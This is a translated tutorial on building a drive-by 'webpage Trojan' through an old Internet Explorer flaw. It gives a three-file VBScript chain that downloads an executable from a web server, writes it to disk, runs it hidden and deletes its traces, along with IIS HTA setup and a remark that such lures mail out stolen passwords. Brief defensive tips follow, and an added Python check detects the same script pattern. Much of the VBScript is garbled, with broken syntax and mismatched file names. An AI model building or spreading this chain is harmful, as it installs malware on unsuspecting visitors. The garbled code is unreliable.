Details of how a webpage Trojan is built

Source: Internet
Author: User

We often hear advice such as: "Do not download programs at will, do not open email attachments at will..." Such advice is indeed useful, but there are many vulnerabilities in our systems. Many Trojans no longer require a client and a server. They exploit these system vulnerabilities to run the Trojan's functions as code that the system considers legitimate, so some Trojans sneak into the system without your knowledge. Here I explain how visiting a webpage can, through an IE6 vulnerability, cause a specified program to be executed, that is, a webpage Trojan.

First, we need to write a few simple files.

I. File named abc.abc
<HTML>

<Script language = "VBScript">

Function httpdoget (URL)

Set oreq = Createobject ("Microsoft. XMLHTTP ")

Oreq. Open "get", URL, false

Oreq. Send

If oreq. Status = 200 then

Httpdoget = oreq. respomsebody

SaveFile httpdoget, "C: win.exe"

End if

Set oreq = nothing

End Function

Sub SaveFile (Str. fname)

Set objstream = Createobject ("ADODB. Stream ")

Objstream. type = 1

Objstream. Open

Objstream. Write Str

Objstream. savetofile fname.2

Objstream. Close ()

Set objstream = nothing

Exewin ()

End sub

Sub exewin ()

Set wshshell = Createobject ("wscript. Shell ")

A = wshshell. Run ("cmd.exe/C: win.exe", 0)

B = wshshell. Run ("cmd.exe/C del C: Win. HTA", 0)

Window. Close

End sub

Httpdoget "http: // 127.0.0.1/test.exe"

</SCRIPT>

</Html>

In this example, test.exe is the Trojan program. It must be placed in the web publishing directory, and the abc.abc file must also be saved in the publishing directory.

II. File named test.htm

<HTML> <body>

Trojan run test! (This sentence can be changed to what you want to say)

<Object date = "http: // 127.0.0.1/win. Test"; ;;></Object>

</Body>

III. File named win.test

<HTML>

<Body>

<Script language = "VBScript">

Function httpdoget (URL)

Set oreq = Createobject ("Microsoft. XMLHTTP ")

Oreq. Open "get", URL, false

Oreq. Send

If oreq. Status = 200 then

Httpdoget, "C: Win. HTA"

Set oreq = nothing

End if

End Function

Sub SaveFile (STR, fname)

Dim FSO, TF

S e t f s o = C r e a t e o B j e c t (scripting. FileSystemObject ")

Set TF = FSO. createtextfile (fname, true)

TF. Write Str

TF. Close

Exewin ()

End sub

Sub exewin ()

Set wshshell = Createobject ("wscript. Shell ")

A = wshshell. Run ("cmd.exe/C: Win. Hat", 0)

Window. Close

End sub

Httpdoget ("http: // 127.0.0.1/ABC. ABC ")

</SCRIPT>

</Body>

</Html>

IV. The Trojan program named test.exe.

...This is just me. If you want to use a Trojan horse, you can replace his name with test.exe.

Server File List

test.htm: the external webpage.

win.test: downloads the abc.abc file to the target machine, saves it as win.hta, and executes it.

abc.abc: downloads the binary Trojan file test.exe and executes it.

test.exe: the Trojan program.

The files mentioned above can be given any name, but the file references in the source code must be changed to match.

Finally, configure IIS: open "Programs > Administrative Tools > Internet Service Manager", right-click the site to be configured, select Properties, and select "HTTP Headers". Click "File Types" under "MIME Map", enter ".hta" as the extension and "application/hta" as the content type (MIME), then close all the windows.

Many of my friends have mentioned that, in chat or in online games, some people shout that Q numbers or other goodies are being given away on some xxx website. Such lures use the principle shown in the example above: without your knowing it, everything on your machine that contains a password or a specific term is sent to the recipient's designated mailbox.

After reading this, do you think this Trojan is too dangerous, or even want to unplug the network cable? In fact, once we understand how a webpage Trojan works, we can easily defend against it. From the content above we can conclude that webpage Trojans are mainly implemented by exploiting IE vulnerabilities. Therefore, the following measures must be taken to ensure safe Internet access:

A. Install the latest version of IE, and install system and IE patches promptly.

B. Do not visit websites you are not familiar with, and be careful even with websites sent by your friends.

C. Do not log on to any pornographic website, or sell some.
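
The chain described above leaves recognisable traces in web traffic: an <object> tag whose data attribute pulls in a second file, a response served as application/hta, and a script that creates the XMLHTTP, ADODB.Stream or FileSystemObject, and WScript.Shell objects together. The following added example (not part of the original article) is a triage check that a proxy or gateway could apply to one HTTP response; the function names, finding labels and sample responses are constructed for illustration.

```python
import re

# ActiveX ProgIDs instantiated by the article's scripts, grouped by role.
# Whitespace around the dot is tolerated to catch light obfuscation.
ROLES = {
    "download": re.compile(r"(?:Microsoft|MSXML2)\s*\.\s*XMLHTTP", re.I),
    "write": re.compile(r"ADODB\s*\.\s*Stream|Scripting\s*\.\s*FileSystemObject", re.I),
    "execute": re.compile(r"WScript\s*\.\s*Shell", re.I),
}
# <object data=...> is how test.htm pulls in the second-stage file.
OBJECT_DATA = re.compile(r"<object\b[^>]*\bdata\s*=\s*[\"']?([^\"'\s>]+)", re.I)
HTA_MIME = "application/hta"


def script_roles(body):
    """Return which of the download/write/execute roles appear in body."""
    return {role for role, rx in ROLES.items() if rx.search(body)}


def assess(content_type, body):
    """Return triage findings for one HTTP response (header value + body)."""
    findings = []
    mime = content_type.split(";")[0].strip().lower()
    if mime == HTA_MIME:
        findings.append("served-as-hta")
    if script_roles(body) == set(ROLES):
        findings.append("download-write-execute-script")
    for target in OBJECT_DATA.findall(body):
        findings.append("object-data:" + target)
    return findings


# Constructed sample responses (not captured traffic); 192.0.2.0/24 is a
# documentation address range.
SAMPLES = [
    ("text/html", '<html><body><object data="http://192.0.2.10/stage.test">'
                  "</object></body></html>"),
    ("application/hta; charset=utf-8",
     'Set a = CreateObject("Microsoft.XMLHTTP")\n'
     'Set b = CreateObject("ADODB. Stream")\n'
     'Set c = CreateObject("WScript.Shell")'),
    ("text/html", "<html><body><p>Hello</p></body></html>"),
]

if __name__ == "__main__":
    for ctype, body in SAMPLES:
        print(ctype, "->", assess(ctype, body) or "no findings")
```

An object-data finding on its own is common on benign pages; it is the combination with an HTA content type or the three script roles that warrants a closer look.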
